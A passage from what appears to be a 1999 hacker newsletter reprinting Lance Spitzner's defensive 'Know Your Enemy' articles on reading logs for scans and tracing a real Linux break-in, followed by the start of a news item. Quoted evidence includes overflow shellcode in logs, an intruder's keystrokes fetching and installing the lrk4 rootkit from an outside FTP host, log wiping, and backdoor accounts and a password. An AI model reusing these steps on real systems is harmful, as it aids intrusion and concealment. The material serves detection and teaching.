- various packet assembly options, both UDP and TCP scanning, randomization, etc. However, you need networking
- skills to use the tool and interpret the data. Below is an example of nmap ran against the same system.
-
- otto #nmap -sS -O 172.17.6.30
-
- Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
- Interesting ports on mozart (172.17.6.30):
- Port State Protocol Service
- 21 open tcp ftp
- 23 open tcp telnet
- 25 open tcp smtp
- 37 open tcp time
- 53 open tcp domain
- 70 open tcp gopher
- 79 open tcp finger
- 80 open tcp http
- 109 open tcp pop-2
- 110 open tcp pop-3
- 111 open tcp sunrpc
- 143 open tcp imap2
- 513 open tcp login
- 514 open tcp shell
- 635 open tcp unknown
- 2049 open tcp nfs
-
- TCP Sequence Prediction: Class=truly random
- Difficulty=9999999 (Good luck!)
- Remote operating system guess: Linux 2.0.35-36
-
- Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
-
- By reviewing your logs, you can determine which of these tools were used against you. To do this, you have to understand
- how the tools work. First, an sscan will log in as follows (this is a default scan with no modifications to any config files):
-
- /var/log/secure
- Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200
- Apr 14 19:18:56 mozart imapd[11635]: connect from 192.168.11.200
- Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 192.168.11.200
- Apr 14 19:18:56 mozart ipop3d[11638]: connect from 192.168.11.200
- Apr 14 19:18:56 mozart in.telnetd[11639]: connect from 192.168.11.200
- Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200
- Apr 14 19:19:03 mozart ipop3d[11642]: connect from 192.168.11.200
- Apr 14 19:19:03 mozart imapd[11643]: connect from 192.168.11.200
- Apr 14 19:19:04 mozart in.fingerd[11646]: connect from 192.168.11.200
- Apr 14 19:19:05 mozart in.fingerd[11648]: connect from 192.168.11.200
-
- /var/log/maillog
- Apr 14 21:01:58 mozart imapd[11667]: command stream end of file, while reading line user=???
- host=[192.168.11.200]
- Apr 14 21:01:58 mozart ipop3d[11668]: No such file or directory while reading line user=???
- host=[192.168.11.200]
- Apr 14 21:02:05 mozart sendmail[11675]: NOQUEUE: [192.168.11.200]: expn root
-
- /var/log/messages
- Apr 14 21:03:09 mozart telnetd[11682]: ttloop: peer died: Invalid or incomplete multibyte or
- wide character
- Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed
-
- sscan also scans for cgi-bin vulnerabilities. These probes will not be logged by syslogd, you will find them in access_log. I
- decided to included them anyway for your edification :)
-
- /var/log/httpd/access_log
- 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/phf HTTP/1.0" 302 192
- 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 170
- 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/test-cgi HTTP/1.0" 404 169
- 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/php.cgi HTTP/1.0" 404 168
- 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/handler HTTP/1.0" 404 168
- 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webgais HTTP/1.0" 404 168
- 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/websendmail HTTP/1.0" 404 172
- 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webdist.cgi HTTP/1.0" 404 172
- 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/faxsurvey HTTP/1.0" 404 170
- 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/htmlscript HTTP/1.0" 404 171
- 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/pfdisplay.cgi HTTP/1.0" 404 174
- 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/perl.exe HTTP/1.0" 404 169
- 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/wwwboard.pl HTTP/1.0" 404 172
- 192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/ews/ews/architext_query.pl
- HTTP/1.0" 404 187
- 192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/jj HTTP/1.0" 404 163
-
- Notice how a complete connection was made for all the ports(SYN, SYN-ACK, ACK) then torn down. That is because
- sscan is determining at the application layer what is going on. Not only does sscan want to know if your ftp port is open, but
- what ftp daemon is running. The same can be said for imap, pop, etc. This can be seen in sniff traces using sniffit, a tool
- commonly used to sniff passwords.
-
- mozart $ cat 172.17.6.30.21-192.168.11.200.7238
- 220 mozart.example.net FTP server (Version wu-2.4.2-academ[BETA-17](1) Tue Jun 9 10:43:14 EDT
- 1998) ready.
-
- As you see above, a complete connection was made to determine the version of wu-ftpd that was running. When you see the
- complete connections in your logs, as shown above, you are most likely being scanned by an exploit tool. These tools are
- making a complete connection to determine what you are running.
-
- Nmap, like most port scanners, does not care what you are running, but if you are running specific services. For this, nmap
- has a powerful set of options, letting you determine what kind of connection to make, including SYN, FIN, Xmas, Null, etc.
- For a detailed description of these options, check out http://www.insecure.org/nmap/nmap_doc.html. Because of these
- options, your logs will be different based on the options selected by the remote user. A connection made with the -sT flag is a
- complete connection, so the logs will like similar to sscan, however by default nmap scans more ports.
-
- /var/log/secure
- Apr 14 21:20:50 mozart in.rlogind[11706]: connect from 192.168.11.200
- Apr 14 21:20:51 mozart in.fingerd[11708]: connect from 192.168.11.200
- Apr 14 21:20:51 mozart ipop2d[11709]: connect from 192.168.11.200
- Apr 14 21:20:51 mozart in.rshd[11710]: connect from 192.168.11.200
- Apr 14 21:20:51 mozart gn[11711]: connect from 192.168.11.200
- Apr 14 21:20:51 mozart gn[11711]: error: cannot execute /usr/sbin/gn: No such file or directory
- Apr 14 21:20:52 mozart in.timed[11712]: connect from 192.168.11.200
- Apr 14 21:20:52 mozart imapd[11713]: connect from 192.168.11.200
- Apr 14 21:20:52 mozart ipop3d[11714]: connect from 192.168.11.200
- Apr 14 21:20:52 mozart in.telnetd[11715]: connect from 192.168.11.200
- Apr 14 21:20:52 mozart in.ftpd[11716]: connect from 192.168.11.200
-
- One thing to keep in mind is the -D (or decoy) option. This nmap option allows the user to spoof the source address. You
- may see scans from 15 different sources at the same time, but only one of them is the real one. It is extremely difficult to
- determine which of the 15 was the actual source. More often, users will select the -sS flag for port scanning. This is a
- stealthier option, as only a SYN packet is sent. If the remote system responds, the connection is immediately torn down with a
- RST. The logs from such a scan looks as follows (NOTE: Only the first five entries are included here)..
-
- /var/log/secure
- Apr 14 21:25:08 mozart in.rshd[11717]: warning: can't get client address: Connection reset by
- peer
- Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown
- Apr 14 21:25:09 mozart in.timed[11718]: warning: can't get client address: Connection reset by
- peer
- Apr 14 21:25:09 mozart in.timed[11718]: connect from unknown
- Apr 14 21:25:09 mozart imapd[11719]: warning: can't get client address: Connection reset by
- peer
- Apr 14 21:25:09 mozart imapd[11719]: connect from unknown
- Apr 14 21:25:09 mozart ipop3d[11720]: warning: can't get client address: Connection reset by
- peer
- Apr 14 21:25:09 mozart ipop3d[11720]: connect from unknown
- Apr 14 21:25:09 mozart in.rlogind[11722]: warning: can't get client address: Connection reset
- by peer
- Apr 14 21:25:09 mozart in.rlogind[11722]: connect from unknown
-
-
- Notice all the errors in the connections. Since the SYN-ACK sequence is torn down before a complete connection can be
- made, the daemon cannot determine the source system. The logs show that you have been scanned, unfortunately you do not
- know by whom. What is even more alarming is, on most other systems (including newer kernels of Linux), none of these errors
- would have been logged. To qoute Fyodor " ... based on all the 'connection reset by peer' messages. This is a Linux 2.0.XX
- oddity -- virtually every other system (including the 2.2 and later 2.1 kernels) will show nothing. That bug (accept() returning
- before completion of the 3-way handshake) was fixed.
-
- Nmap includes other stealth option, such as -sF, -sX, -sN where various flags are used, This is what the logs look like for
- these scans
-
- /var/log/secure
-
-
- Notice something here, no logs! Scary huh, you just got scanned and didn't even know it. All three types of scans determined
- the same results, however you are able to fully log only the first type, -sT (full connection). To detect these stealsth scans, you
- will need to use a different logging application such as tcplogd, scanlogd, or ippl Some commercial Firewalls will also detect
- and log all of these scans (I have confirmed this on Checkpoint Firewall 1).
-
-
- Did They Gain Access?
- Once you have determined that you were scanned, and what you were looking for, the next big question is "Did they get in?".
- Most of today's remote exploits are based on buffer overflows (otherwise known as smashing the stack). Simply stated, a
- buffer overflow is when a program (usually a daemon) receives more input then it expected, thus overwriting critical areas in
- memory. Certain code is then executed, usually giving the user root access. For more info on buffer overflows, check
- Aleph1's excellent paper at ftp://ftp.technotronic.com/rfc/phrack49-14.txt.
-
- You can normally identify buffer overflow attacks in the /var/log/messages log file (or /var/adm/messages for other flavors of
- Unix) for attacks such as mountd. You will also see similar logs in maillog for such attacks against imapd. A buffer overflow
- attack would look like this.
-
- Apr 14 04:20:51 mozart mountd[6688]: Unauthorized access by NFS client 192.168.11.200.
- Apr 14 04:20:51 mozart syslogd: Cannot glue message parts together
- Apr 14 04:20:51 mozart mountd[6688]: Blocked attempt of 192.168.11.200 to mount
- ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
- P~P~P3█3└░^[═~@3╥3└~K┌░^F═~@■┬u⌠1└░^B═~@~E└ubδb^V¼<²t^F■└t^Kδ⌡░0■╚~HF δ∞^░^B~
- I^F■╚~IF^D░^F~IF^H░f1█■├~I±═~@~I^F░^Bf~IF^L░*f~IF^N~MF^L~IF^D1└~IF^P░^P~IF^H░
- f■├═~@░^A~IF^D░f│^D═~@δ^DδLδR1└~IF^D~IF^H░f■├═~@~H├░?1╔═~@░?■┴═~@░?■┴═~@╕.bin@~
- I^F╕.sh!@~IF^D1└~HF^G~Iv^H~IF^L░^K~I≤~MN^H~MV^L═~@1└░^A1█═~@ΦE ² Privet
- ADMcrew~P(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(Apr 14 04:20:51
- mozart ^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^
- E^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E
- ^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^ H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E
- ^H(-^E^H(-^E
-
-
- When you see something like this in your log files, someone has attempted to exploit your system. It is difficult to determine if
- the exploit was successful. One way to do this is, following the exploit attempt, see if there are any connections from the
- remote source to your system. If they successfully login from the remote system, they have access. Another clue is if you find
- the accounts "moof", "rewt", "crak0", or "w0rm" added to your /etc/passwd file. These accounts, uid 0, are added by some of
- the more common exploit scripts. Once a blackhat gains access, normally the first thing they do is wipe your logs clean and
- trojan your logging (syslogd), for more information, see Know Your Enemy: III. From this point on, you will not receive any
- logs from your system as everything has been compromised. What you do next is subject for another article :). Until then, I
- recommend you check out http://www.cert.org/nav/recovering.html
-
- To help me find anomalies in my log files, I whipped up a shell script that scans my logs for me For more detailed information
- on grepping and sorting log files, check out this posting by Marcus Ranum.
-
- Bourne shell script Korn shell script
-
- #!/bin/bash
- #
- # Created 20 April, 1999
- # Lance Spitzner, lance@spitzner.net
- #
- # Shows last 10 entries of critical system logs.
- # Build in some "artificial intelligence" using
- # greps and sorts. You can select a specific
- # hosts logs, or you can select all hosts logs.
- #
- # Add whatever grep/sort statements you want to the
- # functions below. The ones included are just
- # examples.
-
- ##### Build variables
- if [ "$1" = "all" ]; then
- system=""
- else
- system=$1
- fi
-
- log=$2
-
- ##### Functions
- secure () {
- echo -e "\n\t--- Last 10 entries in /var/log/secure ---\n"
- grep "$system" /var/log/secure | grep -v "172.16.1." | tail -10
- }
-
- messages () {
- echo -e "\n\t--- Last 10 entries in /var/log/messages ---\n"
- grep "$system" /var/log/messages | grep -E -v '(named|MARK)' | tail -10
- }
-
- maillog () {
- echo -e "\n\t--- Last 10 entries in /var/log/maillog ---\n"
- grep "$system" /var/log/maillog | tail -10
- }
-
- title () {
- if [ "$system" = "" ]; then
- echo -e "\n### These are the log results of all systems ###"
- else
- echo -e "\n### These are the log results of system $system ###"
- fi
- }
-
- ##### Actual program
- case $log in
- secure)
- title
- secure
- ;;
- messages)
- title
- messages
- ;;
- maillog)
- title
- maillog
- ;;
- all)
- title
- secure
- messages
- maillog
- ;;
- *)
- echo -e "\nUsage: `basename $0` <host> <log>"
- echo
- echo " <host> "
- echo " Can either be a single source you want to grep"
- echo " for in the log, or type \"all\" for all hosts in the"
- echo " log file."
- echo
- echo " <log>"
- echo " secure -> for /var/log/secure"
- echo " messages -> for /var/log/messages"
- echo " maillog -> for /var/log/maillog"
- echo -e "\tall -> for all three log files\n"
- ;;
- esac
-
- exit 0
-
-
- -=-
-
- #!/bin/ksh
- #
- # Created 20 April, 1999
- # Lance Spitzner, lance@spitzner.net
- #
- # Shows last 10 entries of critical system logs.
- # Build in some "artificial intelligence" using
- # greps and sorts. You can select a specific
- # hosts logs, or you can select all hosts logs.
- #
-
- ##### Define input
- if [ "$1" = "all" ]; then
- system=":"
- else
- system=$1
- fi
-
- log=$2
-
- ##### Define logs
- inetdlog=/var/adm/inetdlog
- messages=/var/adm/messages
- syslog=/var/adm/syslog
-
- ##### Functions
- inetdlog () {
- echo "\n\t--- Last 10 entries in $inetdlog ---\n"
- grep "$system" "$inetdlog" | grep -v "172.16.1." | tail -10
- }
-
- messages () {
- echo "\n\t--- Last 10 entries in $messages ---\n"
- grep "$system" "$messages" | egrep -v '(named|MARK)' | tail -10
- }
-
- syslog () {
- echo "\n\t--- Last 10 entries in $syslog ---\n"
- grep "$system" "$syslog" | tail -10
- }
-
- title () {
- if [ "$system" = ":" ]; then
- echo "\n### These are the log results of all systems ###"
- else
- echo "\n### These are the log results of system $system ###"
- fi
- }
-
- ##### Actual program
- case $log in
- inetdlog)
- title
- inetdlog
- ;;
- messages)
- title
- messages
- ;;
- syslog)
- title
- syslog
- ;;
- all)
- title
- inetdlog
- messages
- syslog
- ;;
- *)
- echo "\nUsage: `basename $0` <host> <log>"
- echo
- echo "\t<host> "
- echo "\tCan either be a single source you want to grep"
- echo "\tfor in the log, or type \"all\" for all hosts in the"
- echo "\tlog file."
- echo
- echo "\t<log>"
- echo "\tinetdlog -> for /var/log/inetdlog"
- echo "\tmessages -> for /var/log/messages"
- echo "\tsyslog -> for /var/log/syslog"
- echo "\tall -> for all three log files\n"
- ;;
- esac
-
- exit 0
-
-
-
- Conclusion
- Your system logs can tell you a great deal about the enemy. However, the first step is guaranteeing the integrity of your log
- files. One of the best ways to do that is use a remote log server that receives and stores logs from all systems. Once secured,
- you can then identify patterns in your log files. Based on these patterns and log entries, you can determine what the blackhat is
- looking for, and potentially what tools they are using. Based on this knowledge, you can better secure and protect your
- systems.
-
-
- Author's bio
- Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid
- Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net .
-
-
- Part 3
-
- They Gain Root
- Know Your Enemy: III
-
- Lance Spitzner
- Last Modified: 23 May, 1999
-
- This article is the third of a series focusing on the script kiddie. The first paper focuses on how script kiddies probe
- for, identify, and exploit vulnerabilities. The second paper focuses on how you can detect these attempts, identify
- what tools they are using and what vulnerabilities they are looking for. This paper, the third, focuses on what
- happens once they gain root. Specifically, how they cover their tracks and what the do next.
-
- Who is the script kiddie
-
- As we learned in the first paper, the script kiddie is not so much a person as it is a strategy, the strategy of probing for the easy
- kill. One is not searching for specific information or targeting a specific company, the goal is to gain root the easiest way
- possible. Intruders do this by focusing on a small number of exploits, and then searching the entire Internet for that exploit. Do
- not understimate this strategy, sooner or later they find someone vulnerable.
-
- Once they find a vulnerable system and gain root, their first step is normally to cover their tracks. They want to ensure you do
- not know your system was hacked and cannot see nor log their actions. Following this, they often use your system to scan
- other networks, or silently monitor your own. To gain a better understanding of how they accomplish these acts, we are going
- to follow the steps of a system compromised by an intruder using script kiddie tactics. Our system, called mozart, is a Linux
- box running Red Hat 5.1. The system was compromised on April 27, 1999. Below are the actual steps our intruder took,
- with system logs and keystrokes to verify each step. All system logs were recorded to a protected syslog server, all
- keystrokes were captured using sniffit. Throughout this paper our intruder is refered to as he, however we have no idea what
- the true gender of the intruder is.
-
- The exploit
-
- On 27 April, at 00:13 hours, our network was scanned by the system 1Cust174.tnt2.long-branch.nj.da.uu.net for several
- vulnerabilities, including imap. Our intruder came in noisy, as every system in the network was probed (for more information on
- detecting and analyzing scans, please see the second paper of this series).
-
- Apr 27 00:12:25 mozart imapd[939]: connect from 208.252.226.174
- Apr 27 00:12:27 bach imapd[1190]: connect from 208.252.226.174
- Apr 27 00:12:30 vivaldi imapd[1225]: connect from 208.252.226.174
-
- Apparently he found something he liked and returned at 06:52 and 16:47 the same day. He started off with a more thorough
- scan, but this time focusing only on mozart. He identified a weakness and launched a successful attack against mountd, a
- commonly known vulnerability for Red Hat 5.1. Here we see in /var/log/messages the intruder gaining root. The tool used
- was most likely ADMmountd.c, or something similar to it.
-
- Apr 27 16:47:28 mozart mountd[306]: Unauthorized access by NFS client 208.252.226.174.
- Apr 27 16:47:28 mozart syslogd: Cannot glue message parts together
- Apr 27 16:47:28 mozart mountd[306]: Blocked attempt of 208.252.226.174 to mount
- ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
- ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
-
- Immediately following this exploit, we see in /var/log/messages our intruder gaining root by telneting in as the user crak0, and
- then su to the user rewt. Both of these accounts were added by the exploit script. Our intruder now has total control of our
- system.
-
- Apr 27 16:50:27 mozart login[1233]: FAILED LOGIN 2 FROM 1Cust102.tnt1.long-branch.nj.da.uu.net
- FOR crak, User not known to the underlying authentication module
- Apr 27 16:50:38 mozart PAM_pwdb[1233]: (login) session opened for user crak0 by (uid=0)
- Apr 27 16:50:38 mozart login[1233]: LOGIN ON ttyp0 BY crak0 FROM
- 1Cust102.tnt1.long-branch.nj.da.uu.net
- Apr 27 16:50:47 mozart PAM_pwdb[1247]: (su) session opened for user rewt by crak0(uid=0)
-
- Covering their tracks
-
- The intruder is now on our system as root. As we are now about to see, the next step for him is to make sure he does not get
- caught. First, he checks to see if anyone else is on the system.
-
- [crak0@mozart /tmp]$ w
- 4:48pm up 1 day, 18:27, 1 user, load average: 0.00, 0.00, 0.00
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- crak0 ttyp0 1Cust102.tnt1.lo 4:48pm 0.00s 0.23s 0.04s w
-
- After making sure the coast is clear, he will want to hide all of his actions. This normally entails removing any evidence from the
- logs files and replacing system binaries with trojans, such as ps or netstat, so you cannot see the intruder on your own system.
- Once the trojans are in place, the intruder has gained total control of your system and you will most likely never know it. Just as
- there are automated scripts for hacking, there are also automated tools for hiding intruders, often called rootkits. One of the
- more common rootkits is lrk4. By executing the script, a variety of critical files are replaced, hiding the intruder in seconds.
- For more detailed information on rootkits, see the README that comes with lrk4. This will give you a better idea how
- rootkits work in general.
-
- Within minutes of compromising our system, we see the intruder downloading the rootkit and then implementing the script with
- the command "make install". Below are the actual keystrokes the intruder typed to hide himself.
-
- cd /dev/
- su rewt
- mkdir ". "
- cd ". "
- ftp technotronic.com
- anonymous
- fdfsfdsdfssd@aol.com
- cd /unix/trojans
- get lrk4.unshad.tar.gz
- quit
- ls
- tar -zxvf lrk4.unshad.tar.gz
- mv lrk4 proc
- mv proc ". "
- cd ". "
- ls
- make install
-
- Notice the first thing that our intruder did, he created the hidden directory ". " to hide his toolkit. This directory does not show
- up with the "ls" command, and looks like the local directory with "ls -la" command. One way you can locate the directory is
- with the "find" command (be sure you can trust the integrity of your "find" binary).
-
- mozart #find / -depth -name "*.*"
- /var/lib/news/.news.daily
- /var/spool/at/.SEQ
- /dev/. /. /procps-1.01/proc/.depend
- /dev/. /.
- /dev/.
-
- Our intruder may have been somewhat sophisticated in using trojan binaries, but had a simpler approach to cleaning the logs
- files. Instead of using cleaning tools such as zap2 or clean, he copied /dev/null to the files /var/run/utmp and /var/log/utmp,
- while deleting /var/log/wtmp. You know something is wrong when these logs files contain no data, or you get the following
- error:
-
- [root@mozart sbin]# last -10
- last: /var/log/wtmp: No such file or directory
- Perhaps this file was removed by the operator to prevent logging last info.
-
- The next step
-
- Once a system has been compromised, intruders tend to do one of two things. First, they use your system as a launching pad
- and scan or exploit other systems. Second, they decided to lay low and see what they can learn about your system, such as
- accounts for other systems. Our intruder decided for option number two, lay low and see what he could learn. He
- implemented a sniffer on our system that would capture all of our network traffic, including telnet and ftp sessions to other
- systems. This way he could learn logins and passwords. We see the sytem going into promiscuous mode in /var/log/messages
- soon after the compromise.
-
- Apr 27 17:03:38 mozart kernel: eth0: Setting promiscuous mode.
- Apr 27 17:03:43 mozart kernel: eth0: Setting promiscuous mode.
-
- After implementing the trojan binaries, clearning the log files, and starting the sniffer, our intruder disconnected from the system.
- However, we will see him returning the next day to find what traffic he captured.
-
- Damage Control
-
- Since our friend had disconnected, this gave me a chance to review the system and see what exactly happened. I was
- extremely interested to see what was altered, and where he was logging the sniffer information. First, I quickly identified with
- Tripwire which files were modified. Tripwire showed the following:
-
- added: -rw-r--r-- root 5 Apr 27 17:01:16 1999 /usr/sbin/sniff.pid
- added: -rw-r--r-- root 272 Apr 27 17:18:09 1999 /usr/sbin/tcp.log
- changed: -rws--x--x root 15588 Jun 1 05:49:22 1998 /bin/login
- changed: drwxr-xr-x root 20480 Apr 10 14:44:37 1999 /usr/bin
- changed: -rwxr-xr-x root 52984 Jun 10 04:49:22 1998 /usr/bin/find
- changed: -r-sr-sr-x root 126600 Apr 27 11:29:18 1998 /usr/bin/passwd
- changed: -r-xr-xr-x root 47604 Jun 3 16:31:57 1998 /usr/bin/top
- changed: -r-xr-xr-x root 9712 May 1 01:04:46 1998 /usr/bin/killall
- changed: -rws--s--x root 116352 Jun 1 20:25:47 1998 /usr/bin/chfn
- changed: -rws--s--x root 115828 Jun 1 20:25:47 1998 /usr/bin/chsh
- changed: drwxr-xr-x root 4096 Apr 27 17:01:16 1999 /usr/sbin
- changed: -rwxr-xr-x root 137820 Jun 5 09:35:06 1998 /usr/sbin/inetd
- changed: -rwxr-xr-x root 7229 Nov 26 00:02:19 1998 /usr/sbin/rpc.nfsd
- changed: -rwxr-xr-x root 170460 Apr 24 00:02:19 1998 /usr/sbin/in.rshd
- changed: -rwxr-x--- root 235516 Apr 4 22:11:56 1999 /usr/sbin/syslogd
- changed: -rwxr-xr-x root 14140 Jun 30 14:56:36 1998 /usr/sbin/tcpd
- changed: drwxr-xr-x root 2048 Apr 4 16:52:55 1999 /sbin
- changed: -rwxr-xr-x root 19840 Jul 9 17:56:10 1998 /sbin/ifconfig
- changed: -rw-r--r-- root 649 Apr 27 16:59:54 1999 /etc/passwd
-
- As you can see, a variety of binaries and files were modified. There were no new entries in /etc/passwd (wisely, he had
- removed the crak0 and rewt accounts), so our intruder must have left a backdoor in one of the modified binaries. Also, two
- files were added, /usr/sbin/sniff.pid and /usr/sbin/tcp.log. Not suprisingly, /usr/sbin/sniff.pid was the pid of the sniffer,
- /usr/sbin/tcp.log was where he was storing all of his captured information. Based on /usr/sbin/sniff.pid, the sniffer turned out to
- be rpc.nfsd. Our intruder had compiled a sniffer, in this case linsniffer, and replaced rpc.nfsd with it. This ensured that if the
- system was rebooted, the sniffer would be restarted by the init process. Strings confirms rpc.nfsd is the sniffer:
-
- mozart #strings /usr/sbin/rpc.nfsd | tail -15
- cant get SOCK_PACKET socket
- cant get flags
- cant set promiscuous mode
- ----- [CAPLEN Exceeded]
- ----- [Timed Out]
- ----- [RST]
- ----- [FIN]
- %s =>
- %s [%d]
- sniff.pid
- eth0
- tcp.log
- cant open log
- rm %s
-
- After reviewing the system and understanding what happened, I left the system alone. I was curious to see what the intruder's
- next steps would be. I did not want him to know that I had caught him, so I removed all of my entries from /usr/sbin/tcp.log.
-
- The Script Kiddie Returns
-
- The following day our friend returned. By logging his keystrokes, I quickly identified the backdoor, /bin/login was trojaned.
- This binary, used for telnet connections, was configured to allow the account "rewt" root privileges with the password "satori".
- The password "satori" is the default password for all trojaned binaries that the rootkit lrk4 uses, a giveaway that your system
- may have been compromised.
-
- The intruder was checking on his sniffer to ensure it was still functioning. Also, he wanted to confirm if any accounts were
- captured since the previous day. You can review his keystrokes at keystrokes.txt. Notice at the bottom of the log our
- intruder kills the sniffer. This was the last thing he did before terminating the session. However, he quickly returned several
- minutes later with another session, only to start the sniffer again. I'm not exactly sure why he did this.
-
- This process of checking the system continued for several days. Every day the intruder would connect to the system to confirm
- the sniffer was running and if it had captured any valuable data. After the fourth day, I decided that this was enough and
- disconnected the system. I had learned enough from the intruder's actions and was not going to learn anything new.
-
- Conclusion
-
- We have seen in this paper how an intruder may act , from start to finish, once they gain root on your system. They often begin
- by checking to see if anyone is on the system. Once they know the coast is clear, they cover their tracks by clearing the logfiles
- and replacing or modifying critical files. Once they are safely hidden, they move onto new and more damaging activities. These
- tactics are here to stay, as new exploits are constantly being discovered. To better protect yourself against these threats, I
- recommend you armor your systems. Basic armoring will protect against most script kiddie threats, as they normally go for the
- easy kill. For ideas on how to armor your system, check out Armoring Linux or Armoring Solaris. If it is to late and you feel
- your system has already been compromised, a good place to start is CERT's site "Recovering from an Incident" .
-
-
- Author's bio
- Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid
- Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net .
-
- @HWA
-
- 11.0 Cox Report Blasts DOE Computer Security
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- From HNN http://www.hackernews.com/
-
- contributed by erewhon
- In addition to revealing that China has stole numerous
- military secrets from the US the Cox Report, unclassified
- yesterday, blasts the Department of Energy on
- computer security. The report blamed the DOE for giving
- to much computer access to foreign nationals. The
- issue is access to systems or information covered by
- export control laws. While the systems or software are
- not physically exported, use of the technology by some
- foreign nationals is called a "deemed export" and is
- covered under Department of Commerce rules.
-
- Federal Computer Week
- http://www.fcw.com/pubs/fcw/1999/0524/web-doe-5-25-99.html
-
- MAY 25, 1999 . . . 18:25 EDT
-
-
- House report faults DOE computer access by
- foreign nationals
-
- BY ELANA VARON (varon@fcw.com)
-
- A report issued today about theft of U.S. nuclear secrets by China
- concludes that the Energy Department has been too free in granting foreign
- nationals access to its supercomputers.
-
- The report, by the House Select Committee on U.S. National Security and
- Military/Commercial Concerns With the People's Republic of China, said
- DOE officials are required to review whether such access violates federal
- export controls. But the report also said lab officials "lack an essential
- understanding" of the export rules. The report cited interviews with Commerce
- Department officials who said they did not recall ever receiving a license
- application to "export" the technology from any of the labs.
-
- Although the systems or software are not physically exported, use of the
- technology by some foreign nationals is called a "deemed export" because
- sending the technology overseas would require a license. The report said the
- labs do not measure the power of their systems in such a way that they could
- determine which systems are subject to the export rules, and lab officials never
- asked Commerce how to determine if the DOE systems were subject to
- export control.
-
- The report also concluded that foreign graduate students and staff at U.S.
- universities who are conducting DOE-supported research have the same
- computer privileges as students who are U.S. citizens, even though some of
